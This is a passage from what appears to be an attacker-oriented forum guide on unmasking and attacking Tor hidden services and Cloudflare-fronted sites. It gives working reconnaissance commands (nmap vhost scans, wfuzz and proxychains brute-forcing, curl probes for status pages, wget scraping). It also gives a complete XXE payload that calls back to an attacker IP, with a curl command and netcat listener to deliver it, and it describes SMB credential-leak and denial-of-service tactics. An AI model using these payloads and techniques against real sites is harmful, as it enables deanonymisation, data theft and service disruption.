nmap -sS -p80 -T5 --open --script=http-vhosts --script-args="http-vhosts.domain=target-site.com,http-vhosts.filelist=subdomains-found.txt" -iL netblocks.txt

It's one of the few ways you can *try* to locate an onion site without an SSL or SSH fingerprint (which you'll generally never have). Unfortunately the high rate of false positives makes it pretty useless.


--== Mapping the site structure

I've mentioned mapping the site before. It doesn't have a good success rate on its own, but if you explore and map out the site it'll give you a lot of additional information that you'll probably find useful anyway - forms, addresses and phone numbers, upload scripts, information about image hosting and CDNs, subcontractor names, company names, email addresses, the occasional raw ip address or hostname, and subdomains you never would have guessed. This isn't going to be a guide on how to use dirb666, wfuzz, etc.
Obvious defensive note: if you're running ANY sort of darknet site you really need to have your own small network, virtualized or real, whatever. Your webservers can not know their real ip addresses and should at the very least be behind some sort of NAT, SNAT, or other port forwarding/address translation.

Bash command - this command is just useful! It'll pull every valid ip address out of file.txt:

grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt

It'd be nice to have a burp plugin that alerts you when a valid ip address shows up in a response. Maybe there already is one and I just can't find it. Anyway, if you haven't found the site yet, doing this sort of mapping through cloudflare is extremely annoying. Doing it to a tor site is a lot more straightforward, but proxychains tends to be unstable, so neither is fun at all.
The quality of your wordlists is really important. If you're scanning through cloudflare or precariously tunnelling your requests through tor's socks proxy, you don't want to waste a lot of requests. You can do things like scan / for directories (non-recursively) and then use a wordlist of php files to find php files in the directories you found. You can always rescan directories you've found later. Most darknet sites are written in PHP, and while anything can be hidden behind cloudflare, it's usually a CMS of some sort.

Tools for mapping site structures:
robots.txt and sitemap.xml
Burp Proxy (in proxy mode)
OWASP Zap (I assume, it really should be able to)
dirb666 - my favorite
wfuzz - syntax is weird but it's more flexible than dirb666. It also needs way more memory to run. The first parameter you're fuzzing is called FUZZ, the second one (in the order you defined them on the cli) is FUZ2Z, and so on.
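A couple of hedged wfuzz examples (the wordlist names and urls are placeholders, --hc 404 hides the 404 responses, and as mentioned proxychains can be flaky so expect to babysit the onion version):

wfuzz -c -z file,common-dirs.txt --hc 404 https://target-site-here/FUZZ/
proxychains4 -q wfuzz -c -z file,common-dirs.txt -z file,php-files.txt --hc 404 http://xxxxxxxxxxxxxxxx.onion/FUZZ/FUZ2Z.php

The second one shows the FUZZ/FUZ2Z thing: the first wordlist fills in the directory, the second fills in the php filename.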


- Javascript files

Javascript files that aren't generic libraries tend to have a lot of urls in them. You can then see what those urls have to do with the main site. Most of them won't be relevant, but it's a really interesting place to look. As an added plus you get details about how to construct valid requests. You can also pull similar lists of URLs out of mobile apps, but I haven't seen a hidden site with an Android app yet.

Tools:
JSScanner - https://github.com/dark-warlord14/JSScanner.git - https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/
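If you've already got the javascript saved locally (via wget, or by saving responses out of Burp), a dumb grep gets you most of the way there - the ./somesite.com path is a placeholder:

grep -rhEo --include="*.js" "https?://[^\"' )]+" ./somesite.com/ | sort -u
grep -rhEo --include="*.js" "\"/[A-Za-z0-9_./-]+\"" ./somesite.com/ | sort -u

The first pulls out absolute urls, the second pulls out quoted relative paths (api endpoints and the like).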


- APIs

If you find some sort of API (maybe referenced in javascript, maybe you just found a path like /v1/ or /api), you can brute force the url with a wordlist specifically made for APIs. If you're lucky it'll be obvious how to get it to work, since the average API is a ball of interesting information that, if you poke it correctly, will spew out all sorts of details about something.
A lot of sites have APIs somewhere. Even darknet sites usually document their API and will provide it to interested parties. Lastly, APIs almost always provide a lot more information than a normal webpage.


- Other loot

The whole point of mapping a website like this is that you'll inevitably find something useful or interesting. See what you find! Some example unexpected finds:
- outdated contact info
- test scripts of various sorts
- admin/manager interfaces
- directories like "database" or "backup"
- things that might be willing to email you


--== Misc Exploits/Misconfigurations/Tools

- Status Pages and Similar Mistakes

Most webservers have a built in status page that's almost never configured to be accessible from the internet. The status page lists everything that's connected to that daemon. Someone has to have screwed up pretty badly for a hidden site to expose one of these urls, but it doesn't hurt to check: try /status for nginx and /server-status for apache. In general I like to eventually run Nikto on sites I'm working on, because Nikto checks for things like status pages that I've forgotten about. It's otherwise not incredibly useful. Onionscan will also check for status pages.
It's also not a bad idea to try http://sitehere/cpanel or /whm - these URLs are supposed to redirect to the real hostname of the server on a port in the 2082-2087 range.
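Quick manual versions of those checks with curl (target-site-here is a placeholder; add proxychains4 for an onion; -I just shows the headers so you can see where /cpanel tries to redirect you):

curl -sk https://target-site-here/server-status | head -20
curl -sk https://target-site-here/status | head -20
curl -skI https://target-site-here/cpanel

If the apache one is open you'll get a table of client ips and requested urls; nginx's stub status page is just connection counters.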


- Wordpress upload directory

Every wordpress site has a directory called https://sitename.com/wp-content/uploads. If you can list its contents, it's not that unusual to find various backup files of the site. There's a tool called wpscan (which used to be free) that has a database of wordpress plugin exploits. You have to pay for it now, unfortunately - it sounds incredibly boring to maintain and I'm not surprised they want money for it. If you can figure out what software a site is using, there might be other scanners or known exploits for it. For a cloudflare site, try https://builtwith.com to identify the website software.
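A quick, hedged check for whether directory indexing is on for the uploads folder (works through cloudflare too, though the page may be cached):

curl -sk https://sitename.com/wp-content/uploads/ | grep -i "index of"

If that hits, browse the year/month subdirectories by hand - that's where stray backups and database dumps tend to end up.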


- changelog.txt

A lot of off-the-shelf site software leaves a changelog.txt sitting around. Even if it doesn't state the version of the software, you can generally search around for the commit id (it's a big hexadecimal string). Wordpress leaves a readme.html file sitting around instead.


- Google Image Search

Google image search can search for pictures based on what they look like rather than anything about the actual file. You can't do this from your cellphone. Go to images.google.com, click the black camera icon, and upload the picture you'd like to find online.


- Burp Collaborator Everywhere plugin

Someone at Portswigger wrote a plugin called "Collaborator Everywhere" that's useful for unmasking hidden sites. I only found it yesterday. If you don't already have a legitimate copy of Burp Professional (which is what lets you load extensions), I wouldn't spend the money just for this. The paper is here: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
Basically you enable the plugin and open the Collaborator tool, and the plugin sticks a unique collaborator dns name into every http field and parameter it finds as you browse through the site in proxy mode. I had some problems with this plugin, both with it not loading after the first time I installed it, and with Collaborator getting my ip address wrong due to all the socks proxies in the way. Considering it was written with unmasking servers in mind, I figured I'd include it despite never having seen it succeed.

Related urls:
https://digitalforensicstips.com/2017/11/using-burp-suites-collaborator-to-find-the-true-ip-address-for-a-onion-hidden-service/


- XML input forms

XML forms occasionally allow for what's called an XXE (XML External Entity) attack. I don't think you usually need valid parameters, since it abuses the document type definition features built into the xml standard and old versions of libxml. I've never found a form vulnerable to this, but I honestly haven't looked much.
This functionality exists so that XML can be extended into other document types, which you define under DOCTYPE. It's one of those fundamental stupid decisions, like the AWS metadata service handling credentials or Windows automatically resolving smb shares. There's a variation on this attack called the "Billion Laughs Attack" - a denial of service that's worth looking up if you're into crashing things.
You should try submitting XXE-POST-body.txt either on its own or prepended to an existing XML form submission. A few things (like MS Sharepoint servers) will accept XML input for forms that also accept multipart-form submissions, though I have no idea whether they've ever been vulnerable. I'm told it's worth trying to change the mime-type to XML and submitting something like the following:

----- XXE-POST-body.txt -----
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://youripaddresshere/">]>
<foo>&xxe;</foo>
-----

Just like with the wordpress exploit, you can save yourself having to manually construct an http(s) request by using curl. Start a listener on port 80 first, obviously.

Example:
curl -k -i -X POST http://target-site-here/api/v2/submit -H "Content-Type: application/xml" -H "Accept: application/xml" --data "@XXE-POST-body.txt"

Point this at a netcat listener if you want to see the full request.


- IP addresses and hostnames in output

It's not that uncommon to find all sorts of interesting things in a website if you can just grep through the output. Apparently you can make burp write a log of traffic that you can then run grep commands against (https://www.reddit.com/r/AskNetsec/comments/k6ak9s/easy_way_of_making_burp_note_ip_addresses/). Examples of stuff to look for: valid ip addresses, urls, subdomains, email addresses, usernames, full filesystem paths, error messages, etc.
As an alternative to burp you can always try web-whacking the site (recursively downloading its contents as html) and then grepping the output of that.

Download the site recursively:
wget -r -l 3 http://somesite.com

Useful grep commands:
grep -Hri '@' ./somesite.com/*
Or the ip address grep:
grep -Hr -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" ./somesite.com/*
Compare two versions of the site easily:
diff -r ./somesite.com/ ./somesite.com.old/

If you try this you'll notice that wget gets caught in loops all the time - it's still one of the better tools for downloading a static copy of a site, though. diff -r compares directories, so if you downloaded the site the same way both times it'll tell you what's changed.


- Google dorking for stuff

It's always worth searching a website in google or yandex for stuff like microsoft documents and backup files:
(in google) site:somewebsite filetype:sql

Other file formats to try: mdb (microsoft access database), doc, docx, xml, zip, bak, txt, pdf, ppt, myd/myi, tar.gz, tgz
Other useful google operators are inurl:, intitle:, 00..99 (a range of numbers), and stuff like that.


- End User Attacks

I pretty much never try to attack end users because I know very little about Windows. The non-fiction book "Kingpin" is worth reading - the real life protagonist used almost entirely client side attacks. There's a really ugly and large number of ways you can execute code via any MS Office product. Additionally, some applications and document formats are prone to connecting outwards whenever they encounter a valid SMB URI. For example, there was a recent Zoom (video chat software) bug where if you put a link like //1.2.3.4/share/foo.txt into chat it'd turn it into a clickable blue URL, and anyone who clicked it would forward both their ip address and their hashed windows credentials to you.


- DoS attacks

I usually don't DoS stuff, but the actual tor daemon that forwards to the hidden service is known to be a weak link, especially for people using older versions of tor. There was a lot of discussion on Dread around a year ago about ways of configuring tor to withstand attempts to overload it with circuits, so if you're defending a site you might want to read up.
In addition, tons of standard website software has easy-to-stress urls, like php files intended to be run by cronjobs (*cron.php) and search features, especially ones that allow wildcards.

Tool:
https://github.com/k4m4/onioff